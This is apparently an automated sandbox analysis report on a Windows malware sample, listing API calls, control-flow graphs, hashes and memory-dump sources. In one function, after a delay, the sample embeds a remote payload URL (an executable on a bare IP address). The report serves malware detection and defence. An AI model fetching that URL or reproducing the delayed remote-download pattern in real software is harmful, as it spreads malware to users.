                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1687354797-0
                                                                                                                                                                                                                                                                • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                                                                                                                                                                                                                                • __Cnd_signal.LIBCPMT ref: 00405828
                                                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                                                                                                                                                                                                                                • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2059591211-0
                                                                                                                                                                                                                                                                • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                                • String ID: F(@
                                                                                                                                                                                                                                                                • API String ID: 1611280651-2698495834
                                                                                                                                                                                                                                                                • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                                                • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 452 42e185-42e188 436->452 443 42e176 437->443 444 42e14a-42e167 CreateThread 437->444 445 42e178-42e184 call 42e03d 443->445 447 42e189-42e18e 444->447 448 42e169-42e175 GetLastError call 42ea93 444->448 445->452 450 42e190-42e193 447->450 451 42e195-42e197 447->451 448->443 450->451 451->445
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0042E170
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2744730728-0
                                                                                                                                                                                                                                                                • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                                                • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 467 43477a-43477e 460->467 466 4347b3-4347c8 462->466 462->467 463->467 468 4347cd-4347d2 466->468 467->468
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043479F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                                                • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                                                                                                                                                                                                                                • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1818849710-0
                                                                                                                                                                                                                                                                • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                                                • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 486 42e0bc-42e0be 484->486 485->484 487 42e0ad-42e0ae CloseHandle 485->487 486->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 486->488 487->484
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                                                  • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                                                  • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 0042E086
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                                                                                                                                                                                                                                • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1198197534-0
                                                                                                                                                                                                                                                                • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                                • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->492
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00402563
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3873111417-0
                                                                                                                                                                                                                                                                • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                                                                                                                                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$Sleep
                                                                                                                                                                                                                                                                • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                                                • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                                                                • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0040298F
                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 0040299F
                                                                                                                                                                                                                                                                  • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2843524283-0
                                                                                                                                                                                                                                                                • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000400,?,?,02480223,?,?), ref: 02480E19
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,02480223,?,?), ref: 02480E1E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                • Instruction ID: 625e0f7f1e1b302f448508261efaf1e752b234688f5247d6a6466c6c1b929a9e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85D0123215512877D7003A94DC09BDE7B1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                                • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __fread_nolock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 323602529-0
                                                                                                                                                                                                                                                                • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3886170330-0
                                                                                                                                                                                                                                                                • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                                                • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __wsopen_s
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                                • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                                • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                                • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2005118841-0
                                                                                                                                                                                                                                                                • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                                                • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                                                                                                                                                                                                                                APIs
